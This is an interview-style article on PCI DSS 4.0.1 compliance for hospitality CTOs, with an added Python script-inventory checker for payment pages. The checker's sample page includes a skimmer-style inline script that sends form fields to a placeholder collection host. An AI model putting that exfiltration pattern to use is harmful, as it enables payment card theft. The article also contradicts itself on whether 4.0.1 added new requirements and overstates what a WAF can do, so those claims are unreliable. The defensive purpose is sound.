Time's Up: What Hospitality CTOs Must Do Now for PCI DSS 4.0.1 Compliance
The clock is ticking for hospitality businesses to achieve PCI DSS 4.0.1 compliance before the March 31 deadline. With new documentation and security requirements becoming mandatory, CTOs must act swiftly to assess gaps, implement necessary controls, and ensure third-party vendors are also prepared. Josh Davies, principal technical manager at global cybersecurity provider Fortra, shares critical insights on the most pressing compliance updates, common missteps, and cost-effective strategies to meet requirements without compromising security.
For hospitality IT leaders who are still working toward PCI DSS 4.0.1 compliance, what are the most critical updates they need to focus on before the March 31 deadline?
- Time is against you. To be compliant, you must have implemented all the requirements in PCI DSS 4.0.1, which will move from being ‘best practice’ to mandatory by the March 31st deadline. There are 64 new requirements in 4.0.1 compared to 3.2.1, although many relate to changes in process and documentation rather than actual technical controls.
- 4.0.1 did not add any new requirements; instead, it clarified the intent and focus of existing requirements.
- Hopefully, you have already begun preparations for the March 31st deadline. The first step is to document your existing security controls and configurations against the new requirements and identify gaps. Categorize the outstanding actions by: (1) can be addressed with an existing control; (2) requires updated documentation/process; (3) requires a new control.
- If there are outstanding actions, it is worth prioritizing those that are the most difficult to implement, i.e., those that cannot be resolved by documenting a new process or changing configurations on existing controls (categories 1 and 2). This would include the new requirements around passphrases, MFA, and the documentation around roles and responsibilities.
- An example of a more challenging new requirement that may require a new control would be the requirements intended to prevent card skimming attacks and protect your customers from having their payment information stolen.
- However, there are single solutions or processes that can address multiple related requirements if selected and implemented wisely.
- 6.4.3 requires every script loaded on payment pages to be documented and authorized. 11.6.1 is focused on ensuring the integrity of payment pages delivered to end users.
- Documenting scripts can be done manually, but that will be cumbersome and leave a large window of opportunity for an attacker to steal payment details via XSS (cross site scripting) before it is noticed and removed.
- A WAF, also now required in 6.4.2, is a much better solution. Automating script discovery and including approval mechanisms that only allow approved and authorized scripts to run eliminates the possibility of XSS against your users.
- You probably have a WAF, or maybe your hosting partner manages one for you. It may only be a case of buying and/or configuring an extra client-side protection module.
- These requirements were a response to the prolific Magecart card skimmers but are still very relevant, as just this month, we saw $1.5 billion in cryptocurrency stolen via a malicious JavaScript embedded into a transaction webpage.
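As an added illustration (not code from Fortra or from the article), the approve-then-monitor idea behind 6.4.3 and 11.6.1 can be reduced to a script inventory check: the scripts on the reviewed payment page are fingerprinted at approval time, and later copies of the page are compared against that inventory so that an added third-party script or an altered inline script is reported. The HTML, hostnames and function names below are constructed placeholders.

```python
import hashlib
from html.parser import HTMLParser

# Constructed sample pages (not from any real site). BASELINE is the reviewed and
# approved payment page; CURRENT has one extra external script and a modified
# inline script, the kind of change that 11.6.1 monitoring is meant to catch.
BASELINE_HTML = """<html><body><form id="pay">
<script src="https://psp.example/sdk.js"></script>
<script>initCheckout({locale: "en-GB"});</script>
</form></body></html>"""

CURRENT_HTML = """<html><body><form id="pay">
<script src="https://psp.example/sdk.js"></script>
<script src="https://cdn.example-analytics.net/t.js"></script>
<script>initCheckout({locale: "en-GB"}); sendFields("https://collect.example/p");</script>
</form></body></html>"""


class ScriptCollector(HTMLParser):
    """Collects (src, inline_body) for every <script> element on a page."""
    def __init__(self):
        super().__init__()
        self.scripts, self._src, self._buf = [], None, None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._src, self._buf = dict(attrs).get("src"), []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf).strip()))
            self._src, self._buf = None, None


def script_fingerprints(html):
    """External scripts are identified by src, inline ones by SHA-256 of their body."""
    parser = ScriptCollector()
    parser.feed(html)
    return {("src", src) if src else ("inline", hashlib.sha256(body.encode()).hexdigest())
            for src, body in parser.scripts}


def audit_payment_page(html, authorized):
    """Compare a page's scripts with the approved inventory (6.4.3) and list deviations."""
    present, findings = script_fingerprints(html), []
    for kind, ident in sorted(present - authorized):
        label = "unauthorized external script" if kind == "src" else "unapproved inline script sha256"
        findings.append(f"{label}: {ident}")
    for kind, ident in sorted(authorized - present):
        findings.append(f"authorized script missing ({kind}): {ident}")
    return findings
```

A modified inline script shows up as one missing approved hash plus one unapproved hash, which is the signal to re-review and re-approve it rather than silently accept the new content.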
Many hotels and restaurants work with multiple third-party vendors. How has PCI DSS 4.0.1 changed security expectations for these vendor relationships, and what should CTOs be doing now to mitigate risk?
- PCI DSS 4.0 recognizes the key role that third-party service providers play for hospitality and their IT.
- But they can also introduce risk. Time and time again we have seen threat actors be successful in compromising a third-party provider, or the software they use for remote management, to pass on compromise to their customers in a supply chain attack.
- Organizations are now responsible for documenting responsibilities and risks with their third-party providers.
- Due diligence must be taken to assess the provider's security controls and processes.
- Activity from third parties must be monitored, with alerts to identify abuse.
- CTOs can ask their providers what they have been doing to prepare for PCI 4.0. Good third-party providers will already have documentation they can share to demonstrate their roles and responsibilities, as well as how they are addressing potential risks that are introduced into the CTO’s org by nature of the provider relationship.
- CTOs should also remember that third-party providers, especially managed security providers, may be able to offer further support in quickly achieving compliance with 4.0. Ask the question, "What more could you do to help me achieve PCI DSS 4.0 compliance?"
What are the most common compliance missteps you’re seeing in the hospitality industry, and what practical steps can CTOs take to correct them before the deadline?
- The hospitality industry faces the challenge of applying consistent security across a wide range of technologies and sites. Understanding what systems are in scope for payment protection is the first step in determining how to deploy controls to meet compliance efficiently.
- The set-it-and-forget-it mentality: buying controls or services to meet compliance deadlines and then forgetting all about it until it’s audit time. Not only does this make for an unnecessarily stressful audit, but it also increases the risk of compromise to your organization, employees, and customers.
- Leaving it too late: PCI DSS 4.0 requirements were introduced as ‘best practices’ in April 2024, so there has been ample time to prepare for the ‘mandatory’ deadline at the end of March 2025.
- Focusing only on compliance and not security goes against the spirit of these new regulations, which allow for more flexible, ‘customized approaches’ to security. These approaches allow you to implement unspecified controls or processes that may be better for your technology, security strategy, or use cases while still adhering to the defined requirements.
Beyond compliance, what real-world security risks do hospitality businesses face if they don’t fully adhere to PCI DSS 4.0.1?
- Money is the number one motivator for cybercriminals. In 2024, cybercrime cost the world $9.5 trillion USD and could be considered the third-largest economy if measured as a country. This year, we have already seen significant heists, including $1.5 billion stolen.
- Hospitality organizations are attractive targets for threat actors, as they can monetize a compromise in multiple ways.
- Hospitality organizations deal with personal and payment information daily. There is plenty of data to steal, many opportunities to do so, and easy ways to monetize the stolen data, making hospitality a prime target for data exfiltration objectives.
- Additionally, they face intense pressure to maintain smooth and consistent operations; otherwise, they risk losing revenue or having to issue refunds to customers who can't secure the hotel room or meal they needed. Threat actors know this, and apply the pressure in ransomware objectives, as they know every day you cannot do business is $X lost and paying the ransom becomes more justifiable. (Note: don’t pay the ransoms; you are only feeding the beast!)
You mentioned that future updates might include heightened scrutiny on third-party suppliers and AI-driven threats. How should CTOs in hospitality start preparing for these potential changes now?
- The focus on third-party suppliers ensures they are included in your risk assessments, as many will have access to your data or network—often with high-level privileges. You also may be using hardware or software that they are responsible for securing, which could introduce risk to your business if not addressed.
- Reach out to your third-party providers and ask for any security certifications they have. ISO, SOC2 and NIST are good examples that will demonstrate that they have a certain baseline of security in place.
- You should also do a threat modelling exercise on your third-party suppliers, with and without their participation, so you understand how the third party introduces risk to your business and how you can mitigate risk from each side.
- AI-driven threats are lowering the barrier to entry for attackers and making them more efficient. This trend has continued since before generative AI burst onto the scene and is always important to address.
- So far, AI hasn't introduced entirely new threats—only enhancements to existing tactics and techniques. However, this remains a closely watched area. If that changes, hospitality businesses can rely on a trusted security partner to stay informed and prepared.
- It would not be sufficient to wait for new compliance requirements to arrive to address these threats, as compliance frameworks are not agile enough and tend to lag behind the evolving threat landscape.
For hotels and restaurants already facing budget constraints, what are some cost-effective strategies to achieve compliance without compromising security?
- Managed security services can be a cost-effective way to augment your IT team, or security team if you have one. The consistent pricing will allow for easier forecasting and shield you from the uncertainty of hiring, training, and maintaining a security team in a world where qualified security personnel are scarce.
- Vendor consolidation can be a cost-effective way to achieve compliance and security goals.
- Choose a vendor that prioritizes security innovation, exceeding compliance requirements while providing strong compliance reporting and ongoing feature development.
What are the potential penalties for non-compliance, and how can CTOs communicate the urgency of compliance to executive leadership who may not be as familiar with PCI DSS requirements?
- Fines: you will receive a fine for non-compliance based on your business size and the time period of non-compliance. If there is a breach, fines are an additional $50-90 for each exposed customer record.
- Payment card processing restrictions: resulting in a direct loss of revenue and likely forcing you to enter an expensive partnership with a third party to handle transactions.
- Diminished reputation & legal fees: somewhat harder to predict, but these costs can be significant, with many consumers choosing not to trust brands that have been actively involved in breaches.
- To communicate urgency, connect each of the above scenarios to the bottom line. How much money would we lose if we were taken offline for a week to recover from a ransomware attack? How many customers would we miss out on if we can’t process payments? The longer you are non-compliant, the more likely you are to be compromised, and the bigger compliance fines will be. PCI compliance strengthens your security, reducing the risk of breaches, fines, and other consequences of non-compliance—ensuring your customers can trust you with their payment data.